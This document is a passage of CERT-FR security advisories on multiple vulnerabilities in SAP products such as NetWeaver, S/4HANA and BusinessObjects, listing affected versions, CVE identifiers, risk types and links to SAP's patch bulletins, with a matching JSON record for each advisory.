
CERTFR-2025-AVI-0867

Vulnerability from certfr_avis - Published: 2025-10-14 - Updated: 2025-10-14

Multiple vulnerabilities have been discovered in SAP products. Some of them allow an attacker to cause remote arbitrary code execution, a remote denial of service and a breach of data confidentiality.

Solutions

Refer to the vendor's security bulletin to obtain the patches (see the Documentation section).

Impacted products
Vendor | Product | Description
SAP | SAP NetWeaver AS Java | NetWeaver AS Java version SERVERCORE 7.50 without the latest security patch
SAP | Financial Service Claims Management | Financial Service Claims Management versions INSURANCE 803, 804, 805, 806, S4CEXT 107, 108 and 109 without the latest security patch
SAP | Print Service | Print Service versions SAPSPRINT 8.00 and 8.10 without the latest security patch
SAP | Data Hub Integration Suite | Data Hub Integration Suite version CX_DATAHUB_INT_PACK 2205 without the latest security patch
SAP | BusinessObjects | BusinessObjects versions ENTERPRISE 430, 2025 and 2027 without the latest security patch
SAP | NetWeaver Application Server for ABAP | Application Server for ABAP versions KRNL64UC 7.53, KERNEL 7.53, 7.54, 7.77, 7.89, 7.93 and 9.16 without the latest security patch
SAP | NetWeaver | NetWeaver versions SAP_ABA 700, 701, 702, 731, 740, 750, 751, 752, 75C, 75D, 75E, 75F, 75G, 75H and 75I without the latest security patch
SAP | S/4HANA | S/4HANA versions S4CORE 104, 105, 106, 107, 108 and 109 without the latest security patch
SAP | Cloud Appliance Library Appliances | Cloud Appliance Library Appliances version TITANIUM_WEBAPP 4.0 without the latest security patch
SAP | Commerce Cloud | Commerce Cloud versions HY_COM 2205, COM_CLOUD 2211 and 2211-JDK21 without the latest security patch
SAP | NetWeaver Application Server for ABAP | Application Server for ABAP versions SAP_BASIS 700, 701, 702, 731, 740, 750, 751, 752, 753, 754, 755, 756, 757, 758 and 816 without the latest security patch
SAP | NetWeaver Application Server ABAP and ABAP Platform | NetWeaver Application Server ABAP and ABAP Platform versions KRNL64NUC 7.22, 7.22EXT, KRNL64UC 7.22, 7.22EXT, 7.53, KERNEL 7.22, 7.53, 7.54, 7.77, 7.89, 7.93, 9.14, 9.15 and 9.16 without the latest security patch
SAP | Supplier Relationship Management | Supplier Relationship Management versions SRMNXP01 100 and 150 without the latest security patch
SAP | NetWeaver Application Server ABAP | NetWeaver Application Server ABAP versions RNL64UC 7.53, KERNEL 7.53, 7.54, 7.77, 7.89, 7.93, 9.12 and 9.14 without the latest security patch
References
SAP security bulletin october-2025 2025-10-14 vendor-advisory


{
  "$ref": "https://www.cert.ssi.gouv.fr/openapi.json",
  "affected_systems": [
    {
      "description": "NetWeaver AS Java version SERVERCORE 7.50 sans le dernier correctif de s\u00e9curit\u00e9",
      "product": {
        "name": "SAP NetWeaver AS Java",
        "vendor": {
          "name": "SAP",
          "scada": false
        }
      }
    },
    {
      "description": "Financial Service Claims Management versions INSURANCE 803, 804, 805, 806, S4CEXT 107, 108 et 109 sans le dernier correctif de s\u00e9curit\u00e9",
      "product": {
        "name": "Financial Service Claims Management",
        "vendor": {
          "name": "SAP",
          "scada": false
        }
      }
    },
    {
      "description": "Print Service versions SAPSPRINT 8.00 et 8.10 sans le dernier correctif de s\u00e9curit\u00e9",
      "product": {
        "name": "Print Service",
        "vendor": {
          "name": "SAP",
          "scada": false
        }
      }
    },
    {
      "description": "Data Hub Integration Suite version CX_DATAHUB_INT_PACK 2205 sans le dernier correctif de s\u00e9curit\u00e9",
      "product": {
        "name": "Data Hub Integration Suite",
        "vendor": {
          "name": "SAP",
          "scada": false
        }
      }
    },
    {
      "description": "BusinessObjects versions ENTERPRISE 430, 2025 et 2027 sans le dernier correctif de s\u00e9curit\u00e9",
      "product": {
        "name": "BusinessObjects",
        "vendor": {
          "name": "SAP",
          "scada": false
        }
      }
    },
    {
      "description": "Application Server pour ABAP versions KRNL64UC 7.53, KERNEL 7.53, 7.54, 7.77, 7.89, 7.93 et 9.16 sans le dernier correctif de s\u00e9curit\u00e9",
      "product": {
        "name": "NetWeaver Application Server pour ABAP",
        "vendor": {
          "name": "SAP",
          "scada": false
        }
      }
    },
    {
      "description": "NetWeaver versions SAP_ABA 700, 701, 702, 731, 740, 750, 751, 752, 75C, 75D, 75E, 75F, 75G, 75H et 75I sans le dernier correctif de s\u00e9curit\u00e9",
      "product": {
        "name": "NetWeaver",
        "vendor": {
          "name": "SAP",
          "scada": false
        }
      }
    },
    {
      "description": "S/4HANA versions S4CORE 104, 105, 106, 107, 108 et 109 sans le dernier correctif de s\u00e9curit\u00e9",
      "product": {
        "name": "S/4HANA",
        "vendor": {
          "name": "SAP",
          "scada": false
        }
      }
    },
    {
      "description": "Cloud Appliance Library Appliances version TITANIUM_WEBAPP 4.0 sans le dernier correctif de s\u00e9curit\u00e9",
      "product": {
        "name": "Cloud Appliance Library Appliances",
        "vendor": {
          "name": "SAP",
          "scada": false
        }
      }
    },
    {
      "description": "Commerce Cloud versions HY_COM 2205, COM_CLOUD 2211 et 2211-JDK21 sans le dernier correctif de s\u00e9curit\u00e9",
      "product": {
        "name": "Commerce Cloud",
        "vendor": {
          "name": "SAP",
          "scada": false
        }
      }
    },
    {
      "description": "Application Server pour ABAP versions SAP_BASIS 700, 701, 702, 731, 740, 750, 751, 752, 753, 754, 755, 756, 757, 758 et 816 sans le dernier correctif de s\u00e9curit\u00e9",
      "product": {
        "name": "NetWeaver Application Server pour ABAP",
        "vendor": {
          "name": "SAP",
          "scada": false
        }
      }
    },
    {
      "description": "NetWeaver Application Server ABAP and ABAP Platform versions KRNL64NUC 7.22, 7.22EXT, KRNL64UC 7.22, 7.22EXT, 7.53, KERNEL 7.22, 7.53, 7.54, 7.77, 7.89, 7.93, 9.14, 9.15 et 9.16 sans le dernier correctif de s\u00e9curit\u00e9",
      "product": {
        "name": "NetWeaver Application Server ABAP et ABAP Platform",
        "vendor": {
          "name": "SAP",
          "scada": false
        }
      }
    },
    {
      "description": "Supplier Relationship Management versions SRMNXP01 100 et 150 sans le dernier correctif de s\u00e9curit\u00e9",
      "product": {
        "name": "Supplier Relationship Management",
        "vendor": {
          "name": "SAP",
          "scada": false
        }
      }
    },
    {
      "description": "NetWeaver Application Server ABAP versions RNL64UC 7.53, KERNEL 7.53, 7.54, 7.77, 7.89, 7.93, 9.12 et 9.14 sans le dernier correctif de s\u00e9curit\u00e9",
      "product": {
        "name": "NetWeaver Application Server ABAP",
        "vendor": {
          "name": "SAP",
          "scada": false
        }
      }
    }
  ],
  "affected_systems_content": "",
  "content": "## Solutions\n\nSe r\u00e9f\u00e9rer au bulletin de s\u00e9curit\u00e9 de l\u0027\u00e9diteur pour l\u0027obtention des correctifs (cf. section Documentation).",
  "cves": [
    {
      "name": "CVE-2025-42944",
      "url": "https://www.cve.org/CVERecord?id=CVE-2025-42944"
    },
    {
      "name": "CVE-2025-42906",
      "url": "https://www.cve.org/CVERecord?id=CVE-2025-42906"
    },
    {
      "name": "CVE-2025-42902",
      "url": "https://www.cve.org/CVERecord?id=CVE-2025-42902"
    },
    {
      "name": "CVE-2025-42903",
      "url": "https://www.cve.org/CVERecord?id=CVE-2025-42903"
    },
    {
      "name": "CVE-2025-42910",
      "url": "https://www.cve.org/CVERecord?id=CVE-2025-42910"
    },
    {
      "name": "CVE-2025-42909",
      "url": "https://www.cve.org/CVERecord?id=CVE-2025-42909"
    },
    {
      "name": "CVE-2025-5115",
      "url": "https://www.cve.org/CVERecord?id=CVE-2025-5115"
    },
    {
      "name": "CVE-2025-42984",
      "url": "https://www.cve.org/CVERecord?id=CVE-2025-42984"
    },
    {
      "name": "CVE-2025-42908",
      "url": "https://www.cve.org/CVERecord?id=CVE-2025-42908"
    },
    {
      "name": "CVE-2025-42937",
      "url": "https://www.cve.org/CVERecord?id=CVE-2025-42937"
    },
    {
      "name": "CVE-2025-0059",
      "url": "https://www.cve.org/CVERecord?id=CVE-2025-0059"
    },
    {
      "name": "CVE-2025-48913",
      "url": "https://www.cve.org/CVERecord?id=CVE-2025-48913"
    },
    {
      "name": "CVE-2025-42939",
      "url": "https://www.cve.org/CVERecord?id=CVE-2025-42939"
    },
    {
      "name": "CVE-2025-31672",
      "url": "https://www.cve.org/CVERecord?id=CVE-2025-31672"
    },
    {
      "name": "CVE-2025-31331",
      "url": "https://www.cve.org/CVERecord?id=CVE-2025-31331"
    },
    {
      "name": "CVE-2025-42901",
      "url": "https://www.cve.org/CVERecord?id=CVE-2025-42901"
    }
  ],
  "initial_release_date": "2025-10-14T00:00:00",
  "last_revision_date": "2025-10-14T00:00:00",
  "links": [],
  "reference": "CERTFR-2025-AVI-0867",
  "revisions": [
    {
      "description": "Version initiale",
      "revision_date": "2025-10-14T00:00:00.000000"
    }
  ],
  "risks": [
    {
      "description": "D\u00e9ni de service \u00e0 distance"
    },
    {
      "description": "Injection de requ\u00eates ill\u00e9gitimes par rebond (CSRF)"
    },
    {
      "description": "Ex\u00e9cution de code arbitraire \u00e0 distance"
    },
    {
      "description": "Atteinte \u00e0 l\u0027int\u00e9grit\u00e9 des donn\u00e9es"
    },
    {
      "description": "Non sp\u00e9cifi\u00e9 par l\u0027\u00e9diteur"
    },
    {
      "description": "Contournement de la politique de s\u00e9curit\u00e9"
    },
    {
      "description": "Atteinte \u00e0 la confidentialit\u00e9 des donn\u00e9es"
    }
  ],
  "summary": "De multiples vuln\u00e9rabilit\u00e9s ont \u00e9t\u00e9 d\u00e9couvertes dans les produits SAP. Certaines d\u0027entre elles permettent \u00e0 un attaquant de provoquer une ex\u00e9cution de code arbitraire \u00e0 distance, un d\u00e9ni de service \u00e0 distance et une atteinte \u00e0 la confidentialit\u00e9 des donn\u00e9es.",
  "title": "Multiples vuln\u00e9rabilit\u00e9s dans les produits SAP",
  "vendor_advisories": [
    {
      "published_at": "2025-10-14",
      "title": "Bulletin de s\u00e9curit\u00e9 SAP october-2025",
      "url": "https://support.sap.com/en/my-support/knowledge-base/security-notes-news/october-2025.html"
    }
  ]
}

CERTFR-2025-AVI-0564

Vulnerability from certfr_avis - Published: - Updated:

Multiple vulnerabilities have been discovered in SAP products. Some of them allow an attacker to cause remote arbitrary code execution, privilege escalation and a remote denial of service.

Solutions

Refer to the vendor's security bulletin to obtain the patches (see the Documentation section).

Impacted products
Vendor | Product | Description
SAP | NetWeaver | NetWeaver and ABAP Platform (SDCCN) versions ST-PI 2008_1_700, 2008_1_710 and 740
SAP | NetWeaver | NetWeaver Application Server ABAP and ABAP Platform versions SAP_BASIS 740, SAP_BASIS 750, SAP_BASIS 751, SAP_BASIS 752, SAP_BASIS 753, SAP_BASIS 754, SAP_BASIS 755, SAP_BASIS 756, SAP_BASIS 757 and SAP_BASIS 758
SAP | Business Objects Business Intelligence Platform | BusinessObjects Business Intelligence Platform (Web Intelligence) versions ENTERPRISE 430, 2025, 2027, ENTERPRISECLIENTTOOLS 430, 2025 and 2027
SAP | NetWeaver | NetWeaver Application Server Java version ENGINEAPI 7.50
SAP | NetWeaver | NetWeaver Application Server for ABAP versions SAP_BASIS 700, SAP_BASIS 701, SAP_BASIS 702, SAP_BASIS 731, SAP_BASIS 740, SAP_BASIS 750, SAP_BASIS 751, SAP_BASIS 752, SAP_BASIS 753, SAP_BASIS 754, SAP_BASIS 755, SAP_BASIS 756, SAP_BASIS 757, SAP_BASIS 758 and SAP_BASIS 816
SAP | Business Warehouse | Business Warehouse and SAP BW/4HANA BEx Tools version DW4CORE 100, 200, 300, 400, SAP_BW 700, 701, 702, 731, 740, 750, 751, 752, 753, 754, 755, 756, 757, 758, 816 and SAP_BW_VIRTUAL_COMP 701
SAP | NetWeaver | NetWeaver Enterprise Portal Administration version EP-RUNTIME 7.50
SAP | Business Objects Business Intelligence Platform | Business Objects Business Intelligence Platform (CMC) versions ENTERPRISE 430 and 2025
SAP | NetWeaver | NetWeaver Enterprise Portal Federated Portal Network version EP-RUNTIME 7.50
SAP | NetWeaver | NetWeaver (RFC enabled function module) versions SAP_BW 700, 701, 702, 710, 731, 740, 750, 751, 752, 753, 754, 755, 756, 757, 758, 816, 914 and 916
SAP | NetWeaver | NetWeaver Application Server ABAP versions SAP_BASIS 700, SAP_BASIS 701, SAP_BASIS 702, SAP_BASIS 731, SAP_BASIS 740, SAP_BASIS 750, SAP_BASIS 751, SAP_BASIS 752, SAP_BASIS 753, SAP_BASIS 754, SAP_BASIS 755, SAP_BASIS 756, SAP_BASIS 757, SAP_BASIS 758 and SAP_BASIS 816
SAP | S/4HANA (Private Cloud) | S/4HANA and SAP SCM (Characteristic Propagation) versions SCMAPO 713, 714, S4CORE 102, 103, 104, S4COREOP 105, 106, 107, 108, SCM 700, 701, 702 and 712
SAP | N/A | SAPCAR versions SAP_CAR 7.53 and 7.22EXT
SAP | S/4HANA (Private Cloud) | S/4HANA (Enterprise Event Enablement) versions SAP_GWFND 757 and 758
SAP | NetWeaver | NetWeaver ABAP Server and ABAP Platform versions SAP_BASIS 700, SAP_BASIS 701, SAP_BASIS 702, SAP_BASIS 731, SAP_BASIS 740, SAP_BASIS 750, SAP_BASIS 751, SAP_BASIS 752, SAP_BASIS 753, SAP_BASIS 754, SAP_BASIS 755, SAP_BASIS 756, SAP_BASIS 757, SAP_BASIS 758, SAP_BASIS 914 and SAP_BASIS 915
SAP | NetWeaver | NetWeaver and ABAP Platform versions SAP_BASIS 700, SAP_BASIS 701, SAP_BASIS 702, SAP_BASIS 731, SAP_BASIS 740, SAP_BASIS 750, SAP_BASIS 751, SAP_BASIS 752, SAP_BASIS 753 and SAP_BASIS 754
SAP | NetWeaver | NetWeaver Application Server for Java (Log Viewer) version LMNWABASICAPPS 7.50
SAP | NetWeaver | NetWeaver (XML Data Archiving Service) version J2EE-APPS 7.50
SAP | Business Objects Business Intelligence Platform | BusinessObjects Content Administrator workbench versions DW4CORE 100, 200, 300, 400, SAP_BW 700, 701, 702, 731, 740, 750, 751, 752, 753, 754, 755, 756, 757, 758, 816 and SAP_BW_VIRTUAL_COMP 701
SAP | N/A | Gateway Client versions SAP_GWFND 752, 753, 754, 755, 756, 757 and 758
SAP | N/A | Data Services (DQ Report) versions SBOP_DS_MANAGEMENT_CONSOLE 4.3 and 2025
SAP | NetWeaver | NetWeaver Visual Composer version VCBASE 7.50
SAP | NetWeaver | NetWeaver Business Warehouse (CCAW application) versions DW4CORE 100, 200, 300, 400, SAP_BW 700, 701, 702, 731, 740, 750, 751, 752, 753, 754, 755, 756, 757, 758, 816 and SAP_BW_VIRTUAL_COMP 701
SAP | N/A | Supplier Relationship Management (Live Auction Cockpit) version SRM_SERVER 7.14
SAP | Business Warehouse | Business Warehouse (Business Explorer Web 3.5 loading animation) versions DW4CORE 100, 200, 300, 400, 916, SAP_BW 730, 731, 740, 750, 751, 752, 753, 754, 756, 757 and 758
SAP | NetWeaver | NetWeaver Application Server for ABAP versions SAP_BASIS 701, SAP_BASIS 702, SAP_BASIS 731, SAP_BASIS 740, SAP_BASIS 750, SAP_BASIS 751, SAP_BASIS 752, SAP_BASIS 753, SAP_BASIS 754, SAP_BASIS 755, SAP_BASIS 756, SAP_BASIS 757, SAP_BASIS 758 and SAP_BASIS 816
SAP | Business Objects Business Intelligence Platform | BusinessObjects BI Platform Central Management Console Promotion Management Application versions ENTERPRISE 430, 2025 and 2027
SAP | Business Warehouse | Business Warehouse and SAP Plug-In Basis versions PI_BASIS 2006_1_700, 701, 702, 731, 740, SAP_BW 700, 701, 702, 731, 740, 750, 751, 752, 753, 754, 755, 756, 757, 758 and 816
References
SAP security bulletin july-2025 2025-07-08 vendor-advisory


{
  "$ref": "https://www.cert.ssi.gouv.fr/openapi.json",
  "affected_systems": [
    {
      "description": "NetWeaver et ABAP Platform (SDCCN) versions ST-PI 2008_1_700, 2008_1_710 et 740",
      "product": {
        "name": "NetWeaver",
        "vendor": {
          "name": "SAP",
          "scada": false
        }
      }
    },
    {
      "description": "NetWeaver Application Server ABAP and ABAP Platform versionsAP_BASIS 740, SAP_BASIS 750, SAP_BASIS 751, SAP_BASIS 752, SAP_BASIS 753, SAP_BASIS 754, SAP_BASIS 755, SAP_BASIS 756, SAP_BASIS 757 et SAP_BASIS 758",
      "product": {
        "name": "NetWeaver",
        "vendor": {
          "name": "SAP",
          "scada": false
        }
      }
    },
    {
      "description": "BusinessObjects Business Intelligence Platform (Web Intelligence) versions ENTERPRISE 430, 2025, 2027, ENTERPRISECLIENTTOOLS 430, 2025 et 2027",
      "product": {
        "name": "Business Objects Business Intelligence Platform",
        "vendor": {
          "name": "SAP",
          "scada": false
        }
      }
    },
    {
      "description": "NetWeaver Application Server Java version ENGINEAPI 7.50",
      "product": {
        "name": "NetWeaver",
        "vendor": {
          "name": "SAP",
          "scada": false
        }
      }
    },
    {
      "description": "NetWeaver Application Server for ABAP versions SAP_BASIS 700, SAP_BASIS 701, SAP_BASIS 702, SAP_BASIS 731, SAP_BASIS 740, SAP_BASIS 750, SAP_BASIS 751, SAP_BASIS 752, SAP_BASIS 753, SAP_BASIS 754, SAP_BASIS 755, SAP_BASIS 756, SAP_BASIS 757, SAP_BASIS 758 et SAP_BASIS 816",
      "product": {
        "name": "NetWeaver",
        "vendor": {
          "name": "SAP",
          "scada": false
        }
      }
    },
    {
      "description": "Business Warehouse and SAP BW/4HANA BEx Tools version DW4CORE 100, 200, 300, 400, SAP_BW 700, 701, 702, 731, 740, 750, 751, 752, 753, 754, 755, 756, 757, 758, 816 et SAP_BW_VIRTUAL_COMP 701",
      "product": {
        "name": "Business Warehouse",
        "vendor": {
          "name": "SAP",
          "scada": false
        }
      }
    },
    {
      "description": "NetWeaver Enterprise Portal Administration version EP-RUNTIME 7.50",
      "product": {
        "name": "NetWeaver",
        "vendor": {
          "name": "SAP",
          "scada": false
        }
      }
    },
    {
      "description": "Business Objects Business Intelligence Platform (CMC) versions ENTERPRISE 430 et 2025",
      "product": {
        "name": "Business Objects Business Intelligence Platform",
        "vendor": {
          "name": "SAP",
          "scada": false
        }
      }
    },
    {
      "description": "NetWeaver Enterprise Portal Federated Portal Network version EP-RUNTIME 7.50",
      "product": {
        "name": "NetWeaver",
        "vendor": {
          "name": "SAP",
          "scada": false
        }
      }
    },
    {
      "description": "NetWeaver (RFC enabled function module) versions SAP_BW 700, 701, 702, 710, 731, 740, 750, 751, 752, 753, 754, 755, 756, 757, 758, 816, 914 et 916",
      "product": {
        "name": "NetWeaver",
        "vendor": {
          "name": "SAP",
          "scada": false
        }
      }
    },
    {
      "description": "NetWeaver Application Server ABAP versions SAP_BASIS 700, SAP_BASIS 701, SAP_BASIS 702, SAP_BASIS 731, SAP_BASIS 740, SAP_BASIS 750, SAP_BASIS 751, SAP_BASIS 752, SAP_BASIS 753, SAP_BASIS 754, SAP_BASIS 755, SAP_BASIS 756, SAP_BASIS 757, SAP_BASIS 758 et SAP_BASIS 816",
      "product": {
        "name": "NetWeaver",
        "vendor": {
          "name": "SAP",
          "scada": false
        }
      }
    },
    {
      "description": "S/4HANA and SAP SCM (Characteristic Propagation) versions SCMAPO 713, 714, S4CORE 102, 103, 104, S4COREOP 105, 106, 107, 108, SCM 700, 701, 702 et 712",
      "product": {
        "name": "S/4HANA (Private Cloud)",
        "vendor": {
          "name": "SAP",
          "scada": false
        }
      }
    },
    {
      "description": "SAPCAR versions SAP_CAR 7.53 et 7.22EXT",
      "product": {
        "name": "N/A",
        "vendor": {
          "name": "SAP",
          "scada": false
        }
      }
    },
    {
      "description": "S/4HANA (Enterprise Event Enablement) versions SAP_GWFND 757 et 758",
      "product": {
        "name": "S/4HANA (Private Cloud)",
        "vendor": {
          "name": "SAP",
          "scada": false
        }
      }
    },
    {
      "description": "NetWeaver ABAP Server and ABAP Platform versions SAP_BASIS 700, SAP_BASIS 701, SAP_BASIS 702, SAP_BASIS 731, SAP_BASIS 740, SAP_BASIS 750, SAP_BASIS 751, SAP_BASIS 752, SAP_BASIS 753, SAP_BASIS 754, SAP_BASIS 755, SAP_BASIS 756, SAP_BASIS 757, SAP_BASIS 758, SAP_BASIS 914 et SAP_BASIS 915",
      "product": {
        "name": "NetWeaver",
        "vendor": {
          "name": "SAP",
          "scada": false
        }
      }
    },
    {
      "description": "NetWeaver et ABAP Platform versions SAP_BASIS 700, SAP_BASIS 701, SAP_BASIS 702, SAP_BASIS 731, SAP_BASIS 740, SAP_BASIS 750, SAP_BASIS 751, SAP_BASIS 752, SAP_BASIS 753 et SAP_BASIS 754",
      "product": {
        "name": "NetWeaver",
        "vendor": {
          "name": "SAP",
          "scada": false
        }
      }
    },
    {
      "description": "NetWeaver Application Server for Java (Log Viewer) version LMNWABASICAPPS 7.50",
      "product": {
        "name": "NetWeaver",
        "vendor": {
          "name": "SAP",
          "scada": false
        }
      }
    },
    {
      "description": "NetWeaver (XML Data Archiving Service) version J2EE-APPS 7.50",
      "product": {
        "name": "NetWeaver",
        "vendor": {
          "name": "SAP",
          "scada": false
        }
      }
    },
    {
      "description": "BusinessObjects Content Administrator workbench versions DW4CORE 100, 200, 300, 400, SAP_BW 700, 701, 702, 731, 740, 750, 751, 752, 753, 754, 755, 756, 757, 758, 816 et SAP_BW_VIRTUAL_COMP 701",
      "product": {
        "name": "Business Objects Business Intelligence Platform",
        "vendor": {
          "name": "SAP",
          "scada": false
        }
      }
    },
    {
      "description": "Gateway Client versions SAP_GWFND 752, 753, 754, 755, 756, 757 et 758",
      "product": {
        "name": "N/A",
        "vendor": {
          "name": "SAP",
          "scada": false
        }
      }
    },
    {
      "description": "Data Services (DQ Report) versions SBOP_DS_MANAGEMENT_CONSOLE 4.3 et 2025",
      "product": {
        "name": "N/A",
        "vendor": {
          "name": "SAP",
          "scada": false
        }
      }
    },
    {
      "description": "NetWeaver Visual Composer version VCBASE 7.50",
      "product": {
        "name": "NetWeaver",
        "vendor": {
          "name": "SAP",
          "scada": false
        }
      }
    },
    {
      "description": "NetWeaver Business Warehouse (CCAW application) versions DW4CORE 100, 200, 300, 400, SAP_BW 700, 701, 702, 731, 740, 750, 751, 752, 753, 754, 755, 756, 757, 758, 816 et SAP_BW_VIRTUAL_COMP 701",
      "product": {
        "name": "NetWeaver",
        "vendor": {
          "name": "SAP",
          "scada": false
        }
      }
    },
    {
      "description": "Supplier Relationship Management (Live Auction Cockpit) version SRM_SERVER 7.14",
      "product": {
        "name": "N/A",
        "vendor": {
          "name": "SAP",
          "scada": false
        }
      }
    },
    {
      "description": "Business Warehouse (Business Explorer Web 3.5 loading animation) versions DW4CORE 100, 200, 300, 400, 916, SAP_BW 730, 731, 740, 750, 751, 752, 753, 754, 756, 757 et 758",
      "product": {
        "name": "Business Warehouse",
        "vendor": {
          "name": "SAP",
          "scada": false
        }
      }
    },
    {
      "description": "NetWeaver Application Server for ABAP versions SAP_BASIS 701, SAP_BASIS 702, SAP_BASIS 731, SAP_BASIS 740, SAP_BASIS 750, SAP_BASIS 751, SAP_BASIS 752, SAP_BASIS 753, SAP_BASIS 754, SAP_BASIS 755, SAP_BASIS 756, SAP_BASIS 757, SAP_BASIS 758 et SAP_BASIS 816",
      "product": {
        "name": "NetWeaver",
        "vendor": {
          "name": "SAP",
          "scada": false
        }
      }
    },
    {
      "description": "BusinessObjects BI Platform Central Management Console Promotion Management Application versions ENTERPRISE 430, 2025 et 2027",
      "product": {
        "name": "Business Objects Business Intelligence Platform",
        "vendor": {
          "name": "SAP",
          "scada": false
        }
      }
    },
    {
      "description": "Business Warehouse et SAP Plug-In Basis versions PI_BASIS 2006_1_700, 701, 702, 731, 740, SAP_BW 700, 701, 702, 731, 740, 750, 751, 752, 753, 754, 755, 756, 757, 758 et 816",
      "product": {
        "name": "Business Warehouse",
        "vendor": {
          "name": "SAP",
          "scada": false
        }
      }
    }
  ],
  "affected_systems_content": "",
  "content": "## Solutions\n\nSe r\u00e9f\u00e9rer au bulletin de s\u00e9curit\u00e9 de l\u0027\u00e9diteur pour l\u0027obtention des correctifs (cf. section Documentation).",
  "cves": [
    {
      "name": "CVE-2025-42985",
      "url": "https://www.cve.org/CVERecord?id=CVE-2025-42985"
    },
    {
      "name": "CVE-2025-42968",
      "url": "https://www.cve.org/CVERecord?id=CVE-2025-42968"
    },
    {
      "name": "CVE-2025-42971",
      "url": "https://www.cve.org/CVERecord?id=CVE-2025-42971"
    },
    {
      "name": "CVE-2025-42954",
      "url": "https://www.cve.org/CVERecord?id=CVE-2025-42954"
    },
    {
      "name": "CVE-2025-42970",
      "url": "https://www.cve.org/CVERecord?id=CVE-2025-42970"
    },
    {
      "name": "CVE-2025-42953",
      "url": "https://www.cve.org/CVERecord?id=CVE-2025-42953"
    },
    {
      "name": "CVE-2025-31326",
      "url": "https://www.cve.org/CVERecord?id=CVE-2025-31326"
    },
    {
      "name": "CVE-2025-42961",
      "url": "https://www.cve.org/CVERecord?id=CVE-2025-42961"
    },
    {
      "name": "CVE-2025-42974",
      "url": "https://www.cve.org/CVERecord?id=CVE-2025-42974"
    },
    {
      "name": "CVE-2025-42978",
      "url": "https://www.cve.org/CVERecord?id=CVE-2025-42978"
    },
    {
      "name": "CVE-2025-30012",
      "url": "https://www.cve.org/CVERecord?id=CVE-2025-30012"
    },
    {
      "name": "CVE-2025-42952",
      "url": "https://www.cve.org/CVERecord?id=CVE-2025-42952"
    },
    {
      "name": "CVE-2025-42981",
      "url": "https://www.cve.org/CVERecord?id=CVE-2025-42981"
    },
    {
      "name": "CVE-2025-42979",
      "url": "https://www.cve.org/CVERecord?id=CVE-2025-42979"
    },
    {
      "name": "CVE-2025-42993",
      "url": "https://www.cve.org/CVERecord?id=CVE-2025-42993"
    },
    {
      "name": "CVE-2025-42959",
      "url": "https://www.cve.org/CVERecord?id=CVE-2025-42959"
    },
    {
      "name": "CVE-2025-42963",
      "url": "https://www.cve.org/CVERecord?id=CVE-2025-42963"
    },
    {
      "name": "CVE-2025-42969",
      "url": "https://www.cve.org/CVERecord?id=CVE-2025-42969"
    },
    {
      "name": "CVE-2025-42977",
      "url": "https://www.cve.org/CVERecord?id=CVE-2025-42977"
    },
    {
      "name": "CVE-2025-42986",
      "url": "https://www.cve.org/CVERecord?id=CVE-2025-42986"
    },
    {
      "name": "CVE-2025-42966",
      "url": "https://www.cve.org/CVERecord?id=CVE-2025-42966"
    },
    {
      "name": "CVE-2025-30009",
      "url": "https://www.cve.org/CVERecord?id=CVE-2025-30009"
    },
    {
      "name": "CVE-2025-30011",
      "url": "https://www.cve.org/CVERecord?id=CVE-2025-30011"
    },
    {
      "name": "CVE-2025-42962",
      "url": "https://www.cve.org/CVERecord?id=CVE-2025-42962"
    },
    {
      "name": "CVE-2025-42956",
      "url": "https://www.cve.org/CVERecord?id=CVE-2025-42956"
    },
    {
      "name": "CVE-2025-43001",
      "url": "https://www.cve.org/CVERecord?id=CVE-2025-43001"
    },
    {
      "name": "CVE-2024-53677",
      "url": "https://www.cve.org/CVERecord?id=CVE-2024-53677"
    },
    {
      "name": "CVE-2025-30010",
      "url": "https://www.cve.org/CVERecord?id=CVE-2025-30010"
    },
    {
      "name": "CVE-2025-42997",
      "url": "https://www.cve.org/CVERecord?id=CVE-2025-42997"
    },
    {
      "name": "CVE-2025-42965",
      "url": "https://www.cve.org/CVERecord?id=CVE-2025-42965"
    },
    {
      "name": "CVE-2025-30018",
      "url": "https://www.cve.org/CVERecord?id=CVE-2025-30018"
    },
    {
      "name": "CVE-2025-42967",
      "url": "https://www.cve.org/CVERecord?id=CVE-2025-42967"
    },
    {
      "name": "CVE-2025-42980",
      "url": "https://www.cve.org/CVERecord?id=CVE-2025-42980"
    },
    {
      "name": "CVE-2025-42964",
      "url": "https://www.cve.org/CVERecord?id=CVE-2025-42964"
    },
    {
      "name": "CVE-2025-42992",
      "url": "https://www.cve.org/CVERecord?id=CVE-2025-42992"
    },
    {
      "name": "CVE-2025-42973",
      "url": "https://www.cve.org/CVERecord?id=CVE-2025-42973"
    },
    {
      "name": "CVE-2025-42960",
      "url": "https://www.cve.org/CVERecord?id=CVE-2025-42960"
    }
  ],
  "links": [],
  "reference": "CERTFR-2025-AVI-0564",
  "revisions": [
    {
      "description": "Version initiale",
      "revision_date": "2025-07-08T00:00:00.000000"
    }
  ],
  "risks": [
    {
      "description": "D\u00e9ni de service \u00e0 distance"
    },
    {
      "description": "Injection de code indirecte \u00e0 distance (XSS)"
    },
    {
      "description": "Ex\u00e9cution de code arbitraire \u00e0 distance"
    },
    {
      "description": "Non sp\u00e9cifi\u00e9 par l\u0027\u00e9diteur"
    },
    {
      "description": "D\u00e9ni de service"
    },
    {
      "description": "Falsification de requ\u00eates c\u00f4t\u00e9 serveur (SSRF)"
    },
    {
      "description": "Contournement de la politique de s\u00e9curit\u00e9"
    },
    {
      "description": "Atteinte \u00e0 la confidentialit\u00e9 des donn\u00e9es"
    },
    {
      "description": "\u00c9l\u00e9vation de privil\u00e8ges"
    }
  ],
  "summary": "De multiples vuln\u00e9rabilit\u00e9s ont \u00e9t\u00e9 d\u00e9couvertes dans les produits SAP. Certaines d\u0027entre elles permettent \u00e0 un attaquant de provoquer une ex\u00e9cution de code arbitraire \u00e0 distance, une \u00e9l\u00e9vation de privil\u00e8ges et un d\u00e9ni de service \u00e0 distance.",
  "title": "Multiples vuln\u00e9rabilit\u00e9s dans les produits SAP",
  "vendor_advisories": [
    {
      "published_at": "2025-07-08",
      "title": "Bulletin de s\u00e9curit\u00e9 SAP july-2025",
      "url": "https://support.sap.com/en/my-support/knowledge-base/security-notes-news/july-2025.html"
    }
  ]
}

CERTFR-2025-AVI-0487

Vulnerability from certfr_avis - Published: - Updated:

Multiple vulnerabilities have been discovered in SAP products. Some of them allow an attacker to cause a breach of data confidentiality, a breach of data integrity and server-side request forgery (SSRF).

Solutions

Refer to the vendor's security bulletin to obtain the patches (see the Documentation section).

Impacted products
Vendor | Product | Description
SAP | Business Objects Business Intelligence Platform | Business Objects Business Intelligence Platform versions ENTERPRISE 430, 2025 and 2027
